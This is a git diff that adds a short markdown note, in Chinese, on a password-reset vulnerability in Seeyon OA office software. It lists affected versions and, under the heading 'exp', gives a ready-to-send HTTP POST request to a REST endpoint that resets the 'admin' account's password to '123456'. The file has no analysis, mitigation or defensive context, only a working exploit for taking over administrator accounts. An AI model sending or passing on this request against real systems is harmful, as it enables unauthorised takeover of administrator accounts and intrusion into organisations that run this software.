diff --git a/致远OA密码重置漏洞.md b/致远OA密码重置漏洞.md new file mode 100644 index 0000000..8c759d1 --- /dev/null +++ b/致远OA密码重置漏洞.md @@ -0,0 +1,18 @@ + +## 版本 +``` +Seeyon OA=V5/G6 +Seeyon OA=V8.1SP2 +Seeyon OA=V8.2 +``` +## exp +``` +POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1 +Host: ip +User-Agent: Go-http-client/1.1 +Content-Length: 24 +Content-Type: application/json +Accept-Encoding: gzip + +{"loginName":"admin","password":"123456"} +```